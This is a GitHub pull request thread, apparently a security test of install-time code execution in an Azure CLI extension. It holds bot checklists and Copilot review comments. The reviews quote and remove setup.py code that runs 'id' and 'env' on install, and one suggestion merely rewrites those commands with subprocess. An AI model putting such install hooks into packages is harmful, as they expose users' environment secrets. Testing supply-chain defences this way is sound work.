[Security Test] RCE vulnerability validation - DO NOT MERGE

[wangzelin007]

---

This checklist is used to make sure that common guidelines for a pull request are followed.

Related command

General Guidelines

• Have you run azdev style <YOUR_EXT> locally? (pip install azdev required)
• Have you run python scripts/ci/test_index.py -q locally? (pip install wheel==0.30.0 required)
• My extension version conforms to the Extension version schema

For new extensions:

• My extension description/summary conforms to the Extension Summary Guidelines.

About Extension Publish

There is a pipeline to automatically build, upload and publish extension wheels.
Once your pull request is merged into main branch, a new pull request will be created to update src/index.json automatically.
You only need to update the version information in file setup.py and historical information in file HISTORY.rst in your PR but do not modify src/index.json.

[azure-client-tools-bot-prd]

️✔️Azure CLI Extensions Breaking Change Test

️✔️Non Breaking Changes

[azure-client-tools-bot-prd]

Hi @wangzelin007,
Please write the description of changes which can be perceived by customers into HISTORY.rst.
If you want to release a new extension version, please update the version in setup.py as well.

[yonzhan]

Thank you for your contribution! We will review the pull request and get back to you soon.

[github-actions]

The git hooks are available for azure-cli and azure-cli-extensions repos. They could help you run required checks before creating the PR.

Please sync the latest code with latest dev branch (for azure-cli) or main branch (for azure-cli-extensions).
After that please run the following commands to enable git hooks:

pip install azdev --upgrade
azdev setup -c <your azure-cli repo path> -r <your azure-cli-extensions repo path>

[github-actions]

CodeGen Tools Feedback Collection

Thank you for using our CodeGen tool. We value your feedback, and we would like to know how we can improve our product. Please take a few minutes to fill our codegen survey

[github-actions]

Hi @wangzelin007

Release Suggestions

Module: acat

• Please log updates into to src/acat/HISTORY.rst
• Update VERSION to 1.0.0b2 in src/acat/setup.py

Notes

• For more info about extension versioning, please refer to Extension version schema

[Copilot]

Pull request overview

This pull request is a security test that intentionally introduces malicious code into the Azure CLI extension setup.py file to validate RCE (Remote Code Execution) vulnerability detection mechanisms. The PR title explicitly states "DO NOT MERGE".

Changes:

• Injection of malicious code into the acat extension's setup.py that executes system commands during package installation

[Copilot]

The use of os.system() with hardcoded shell commands is a security anti-pattern. Even for testing purposes, os.system() should be avoided in favor of subprocess.run() with shell=False to prevent shell injection vulnerabilities. Additionally, the bare except clause silently catches and suppresses all exceptions, which could hide errors and make debugging difficult.

Suggested change

	try:
	print("[!] EXTENSION SETUP.PY POISONED [!]")
	os.system("id")
	os.system("env")
	except:
	import subprocess
	try:
	print("[!] EXTENSION SETUP.PY POISONED [!]")
	subprocess.run(["id"], check=False)
	subprocess.run(["env"], check=False)
	except Exception:

[Copilot]

The PR title explicitly states "DO NOT MERGE", yet this PR is being submitted to the main branch. This creates a significant risk that the PR could be accidentally merged, which would inject malicious code into the production extension. If this is genuinely a security test, it should be conducted in a separate testing branch or environment, not against the main branch where accidental merges could occur.

[Copilot]

This code introduces a Remote Code Execution (RCE) vulnerability by executing arbitrary system commands during package installation. The os.system() calls will execute the "id" and "env" shell commands when the setup.py file is run, which happens during pip install, python setup.py install, or when building wheels. This is a critical security issue that:

1. Exposes system information (user identity and environment variables)
2. Demonstrates the ability to execute arbitrary commands on the installation system
3. Could be exploited to exfiltrate sensitive data or compromise the system
4. Will execute automatically during normal package installation workflows

This type of malicious code injection is a common supply chain attack vector. While the PR title indicates this is a security test, such code should never be merged into the main branch as it would execute on any system that installs this extension.

Suggested change

	import os
	import sys
	try:
	print("[!] EXTENSION SETUP.PY POISONED [!]")
	os.system("id")
	os.system("env")
	except:
	pass
	import sys